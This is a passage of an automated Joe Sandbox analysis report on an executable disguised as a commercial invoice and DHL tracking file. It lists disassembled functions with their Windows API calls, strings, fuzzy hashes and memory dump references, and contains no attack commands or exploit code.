HKEY_CURRENT_CONFIG, xrefs: 0048CB79, 0048CB7E
HKCU, xrefs: 0048CBCE

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: b31e78215c04d9e7d477a3ca5053a964ce584295d374fffe22a77a35a0470901
Instruction ID: ed2a7cc976ee06f379692ae362c4bca03eff38a4ab6ac2818ef3541a2519e057
Opcode Fuzzy Hash: b31e78215c04d9e7d477a3ca5053a964ce584295d374fffe22a77a35a0470901
Instruction Fuzzy Hash: 6D71E63260052A8BCB10FE79D9C16BF33919BA0754B11492BF86597384E73DDD8587BC

Function 0049833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0049835A
_wcslen.LIBCMT ref: 0049836E
_wcslen.LIBCMT ref: 00498391
_wcslen.LIBCMT ref: 004983B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004983F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00495BF2), ref: 0049844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00498487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004984CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00498501
FreeLibrary.KERNEL32(?), ref: 0049850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0049851D
DestroyIcon.USER32(?,?,?,?,?,00495BF2), ref: 0049852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00498549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00498555

Strings

.icl, xrefs: 00498368
.dll, xrefs: 004983AB
.exe, xrefs: 00498388

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 5ed259a3dd636ea1506d4e87527b88dddd6922e2630e92815831cad2243b0ba6
Instruction ID: 4e18c377d3a93d3c1868f56d560fd42ffcf80cca71b042c358b88d151030d548
Opcode Fuzzy Hash: 5ed259a3dd636ea1506d4e87527b88dddd6922e2630e92815831cad2243b0ba6
Instruction Fuzzy Hash: BC61D071640215BAEF14DF69DC81BBF7BA8AF05720F10412FF815D61D1DB78A980CBA8

Function 00407778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

Bad directive syntax error, xrefs: 0044519A
#pragma compile, xrefs: 004077D3
#notrayicon, xrefs: 004077E7
#comments-start, xrefs: 0040785F, 004078B1
Cannot parse #include, xrefs: 00445279
Unterminated group of comments, xrefs: 0044528C
", xrefs: 00445153
#include-once, xrefs: 0040782F
#cs, xrefs: 00407873, 004078C5
#comments-end, xrefs: 004078D9
#include, xrefs: 00407847
', xrefs: 00445169
#OnAutoItStartRegister, xrefs: 00407817
#requireadmin, xrefs: 004077FF
#ce, xrefs: 004078ED

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 572253963f525e02906e6e58a8eda6c3630d1565cc9188daafa6b218338521ae
Instruction ID: 143d0d3894ee3fcd827cba236b78bf0a762740ba91adbf79a0b17f8313cd745c
Opcode Fuzzy Hash: 572253963f525e02906e6e58a8eda6c3630d1565cc9188daafa6b218338521ae
Instruction Fuzzy Hash: AD81B471A04205BBDF20AB61DC42FAF3B64AF54344F14403BF905BB2D2EB7CA945C69A

Function 00465A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00465A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00465A40
SetWindowTextW.USER32(?,?), ref: 00465A57
GetDlgItem.USER32(?,000003EA), ref: 00465A6C
SetWindowTextW.USER32(00000000,?), ref: 00465A72
GetDlgItem.USER32(?,000003E9), ref: 00465A82
SetWindowTextW.USER32(00000000,?), ref: 00465A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00465AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00465AC3
GetWindowRect.USER32(?,?), ref: 00465ACC
_wcslen.LIBCMT ref: 00465B33
SetWindowTextW.USER32(?,?), ref: 00465B6F
GetDesktopWindow.USER32 ref: 00465B75
GetWindowRect.USER32(00000000), ref: 00465B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00465BD3
GetClientRect.USER32(?,?), ref: 00465BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00465C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00465C2F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 995c23ee9de8ec63ae521d5336bbf1a014c3310c08a33b5eb24cc9a98bea18a1
Instruction ID: 0a901d73f7802359af014b314dccce5a02935b980301162514e1a12ab8627d3d
Opcode Fuzzy Hash: 995c23ee9de8ec63ae521d5336bbf1a014c3310c08a33b5eb24cc9a98bea18a1
Instruction Fuzzy Hash: 54718171900B059FDB20DFA8CD85A6EBBF5FF48704F10452AE542A26A0D774FD44CB59

Function 004630F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0046318D
_wcslen.LIBCMT ref: 004631F8

Strings

INSTANCE, xrefs: 00463453
CLASSNN, xrefs: 004631F3, 00463204
NAME, xrefs: 00463335, 00463346
CLASS, xrefs: 00463188, 004631A5
REGEXPCLASS, xrefs: 00463255, 00463266
[L, xrefs: 0046339A
TEXT, xrefs: 0046347C

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[L
API String ID: 176396367-2673105605
Opcode ID: 3ef901a7c4d3f7d847686ef54d8ca3cb0fe16cad14b22e338ef83e5d3e0195a7
Instruction ID: dec465ae6880087b831d7e9f7dc700507f7d777555492fb578c4aceba1586c83
Opcode Fuzzy Hash: 3ef901a7c4d3f7d847686ef54d8ca3cb0fe16cad14b22e338ef83e5d3e0195a7
Instruction Fuzzy Hash: 6BE10332A00566ABCB149F64C451BEEFBB0BF44715F54812FE456B3380FB38AE858799

Function 004200C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 004200C6

Part of subcall function 004200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(004D070C,00000FA0,053FFEC2,?,?,?,?,004423B3,000000FF), ref: 0042011C
Part of subcall function 004200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004423B3,000000FF), ref: 00420127
Part of subcall function 004200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004423B3,000000FF), ref: 00420138
Part of subcall function 004200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0042014E
Part of subcall function 004200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0042015C
Part of subcall function 004200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0042016A
Part of subcall function 004200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00420195
Part of subcall function 004200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004201A0

___scrt_fastfail.LIBCMT ref: 004200E7

Part of subcall function 004200A3: __onexit.LIBCMT ref: 004200A9

Strings

SleepConditionVariableCS, xrefs: 00420154
kernel32.dll, xrefs: 00420133
WakeAllConditionVariable, xrefs: 00420162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00420122
InitializeConditionVariable, xrefs: 00420148

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: ed7e43c6380ba617abe833e8cd4ec0574e43a35956320d61fe7d0cf66bf0707d
Instruction ID: 84b6f6118bdc231d3a488da8fe478963a291621794897a1b1255fb41307b7b9d
Opcode Fuzzy Hash: ed7e43c6380ba617abe833e8cd4ec0574e43a35956320d61fe7d0cf66bf0707d
Instruction Fuzzy Hash: 1B21F6327457206BEB106BB5BC46B6A77E4DB05B51F60023BF802E7392DB6D98008A9C

Function 004744C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0049CC08), ref: 00474527
_wcslen.LIBCMT ref: 0047453B
_wcslen.LIBCMT ref: 00474599
_wcslen.LIBCMT ref: 004745F4
_wcslen.LIBCMT ref: 0047463F
_wcslen.LIBCMT ref: 004746A7

Part of subcall function 0041F9F2: _wcslen.LIBCMT ref: 0041F9FD

GetDriveTypeW.KERNEL32(?,004C6BF0,00000061), ref: 00474743

Strings

ramdisk, xrefs: 004746F1
cdrom, xrefs: 0047458F, 00474594
removable, xrefs: 004745EA, 004745EF
all, xrefs: 00474531, 00474536
fixed, xrefs: 00474635, 0047463A
network, xrefs: 0047469D, 004746A2
unknown, xrefs: 00474708

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 7a032b10261071238578d7798be2a8d8f1bbc0d2a2d447e15a69d6f0c622db57
Instruction ID: d98997375423f878c0017acd91fdc058ed6cfa4487477bd8f6599caaed90522b
Opcode Fuzzy Hash: 7a032b10261071238578d7798be2a8d8f1bbc0d2a2d447e15a69d6f0c622db57
Instruction Fuzzy Hash: 5CB103716083029BC710DF28C890ABBB7E5AFD5724F50892EF49A97391E738D845CA5A

Function 0049911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00419BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00419BB2

DragQueryPoint.SHELL32(?,?), ref: 00499147

Part of subcall function 00497674: ClientToScreen.USER32(?,?), ref: 0049769A
Part of subcall function 00497674: GetWindowRect.USER32(?,?), ref: 00497710
Part of subcall function 00497674: PtInRect.USER32(?,?,00498B89), ref: 00497720

SendMessageW.USER32(?,000000B0,?,?), ref: 004991B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004991BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004991DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00499225
SendMessageW.USER32(?,000000B0,?,?), ref: 0049923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00499255
SendMessageW.USER32(?,000000B1,?,?), ref: 00499277
DragFinish.SHELL32(?), ref: 0049927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00499371

Strings

@GUI_DROPID, xrefs: 0049929E
@GUI_DRAGFILE, xrefs: 00499320
@GUI_DRAGID, xrefs: 004992E9
p#M, xrefs: 004992BB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#M
API String ID: 221274066-2015629680
Opcode ID: cc5226adbb9b96ac99bcee9125aa241e4809515293bea636d27be4bdb13d5005
Instruction ID: 3df0e896286e7cc24d35a34c115dd35c96d1348fae80d5e553011d8ae7303d2a
Opcode Fuzzy Hash: cc5226adbb9b96ac99bcee9125aa241e4809515293bea636d27be4bdb13d5005
Instruction Fuzzy Hash: 36618A71108301AFD700EF65CC85DAFBBE8EF99354F00092FF591922A1DB349A49CB5A

Function 0048AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0048B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0048B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0048B1D4
_wcslen.LIBCMT ref: 0048B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0048B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0048B236
_wcslen.LIBCMT ref: 0048B332

Part of subcall function 004705A7: GetStdHandle.KERNEL32(000000F6), ref: 004705C6

_wcslen.LIBCMT ref: 0048B34B
_wcslen.LIBCMT ref: 0048B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0048B3B6
GetLastError.KERNEL32(00000000), ref: 0048B407
CloseHandle.KERNEL32(?), ref: 0048B439
CloseHandle.KERNEL32(00000000), ref: 0048B44A
CloseHandle.KERNEL32(00000000), ref: 0048B45C
CloseHandle.KERNEL32(00000000), ref: 0048B46E
CloseHandle.KERNEL32(?), ref: 0048B4E3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 6c26a828d419c392216f6ba5c3558db43b659c4bbd39098d0d63fa909e086c7f
Instruction ID: bb510aeb41faed9d03c7259fc64420f109ae724ee6bccea42d6d47e6be20ccfc
Opcode Fuzzy Hash: 6c26a828d419c392216f6ba5c3558db43b659c4bbd39098d0d63fa909e086c7f
Instruction Fuzzy Hash: BDF18C315043009FC714EF25C891A6FBBE0EF85718F14896EF8955B2A2CB39EC45CB9A

Function 0040326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(004D1990), ref: 00442F8D
GetMenuItemCount.USER32(004D1990), ref: 0044303D
GetCursorPos.USER32(?), ref: 00443081
SetForegroundWindow.USER32(00000000), ref: 0044308A
TrackPopupMenuEx.USER32(004D1990,00000000,?,00000000,00000000,00000000), ref: 0044309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004430A9

Strings

0, xrefs: 0040327D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: f1fd613179ef594869f11dd80bb4a4429448fc4ee6c5b267f90848000e4c88e0
Instruction ID: 50604dc0154d471f9d9f05728990120ecc12f68252d1d5e29eca4ee7fd44c235
Opcode Fuzzy Hash: f1fd613179ef594869f11dd80bb4a4429448fc4ee6c5b267f90848000e4c88e0
Instruction Fuzzy Hash: 8C711730640215BAFB218F25CD89F9BBF68FF01724F20422BF514662E0C7B9AD54D799

Function 00496CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00496DEB

Part of subcall function 00406B57: _wcslen.LIBCMT ref: 00406B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00496E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00496E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00496E94
DestroyWindow.USER32(?), ref: 00496EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00496EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00496EFD
GetDesktopWindow.USER32 ref: 00496F16
GetWindowRect.USER32(00000000), ref: 00496F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00496F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00496F4D

Part of subcall function 00419944: GetWindowLongW.USER32(?,000000EB), ref: 00419952

Strings

tooltips_class32, xrefs: 00496E58, 00496EDD
0, xrefs: 00496D98

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 6428b4afc25977ee63a403d95399c66df614a0ee7afea08159283990d6292f2d
Instruction ID: 6a0311cad4bd6a39f66962045e872b5819b0b1edc96ae1726a8a34bf2098f0d7
Opcode Fuzzy Hash: 6428b4afc25977ee63a403d95399c66df614a0ee7afea08159283990d6292f2d
Instruction Fuzzy Hash: 6B715874104244AFDB21CF18D894FBBBBFAFB99304F55042EF98997261C774A906CB19

Function 0047C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0047C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0047C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0047C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0047C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0047C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0047C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0047C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0047C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0047C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0047C5F0
InternetCloseHandle.WININET(00000000), ref: 0047C5FB

Strings

, xrefs: 0047C575

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 7c91576087ff3762589d5d9375ec81b3101d2abcd0dc8baf7d7a45dd79255699
Instruction ID: 62966bfdfc762d986eb43c7bc46254d8f994bea3438afeba38a38ba0b5e87711
Opcode Fuzzy Hash: 7c91576087ff3762589d5d9375ec81b3101d2abcd0dc8baf7d7a45dd79255699
Instruction Fuzzy Hash: 4D516FB0500605BFDB218FA1C9C8AAB7BBCFF14744F00842FF94996250D739E9449BA8

Function 0049856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00498592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004985A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004985AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004985BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004985C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004985D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004985E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004985E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004985F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0049FC38,?), ref: 00498611
GlobalFree.KERNEL32(00000000), ref: 00498621
GetObjectW.GDI32(?,00000018,?), ref: 00498641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00498671
DeleteObject.GDI32(?), ref: 00498699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004986AF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
